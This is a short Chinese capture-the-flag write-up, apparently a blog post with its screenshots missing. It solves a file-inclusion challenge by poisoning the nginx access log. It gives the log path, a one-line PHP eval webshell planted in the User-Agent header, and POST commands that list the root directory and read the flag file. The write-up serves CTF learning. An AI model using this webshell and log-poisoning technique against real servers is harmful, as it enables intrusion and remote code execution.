题目分析
打开网页
在这里插入图片描述
正则匹配过滤了php,且大小写不敏感
allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题
解题过程
在这里插入图片描述
?file=/var/log/nginx/access.log
发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话
在这里插入图片描述
在UA中添加一句话木马 <?php eval($_POST[1]);?>
在POST中令1=system('ls /');查看根目录中的文件
发现有个flag.txt 这里应该就是flag在的位置了
在这里插入图片描述
POST中令1=system('cat /flag.txt');
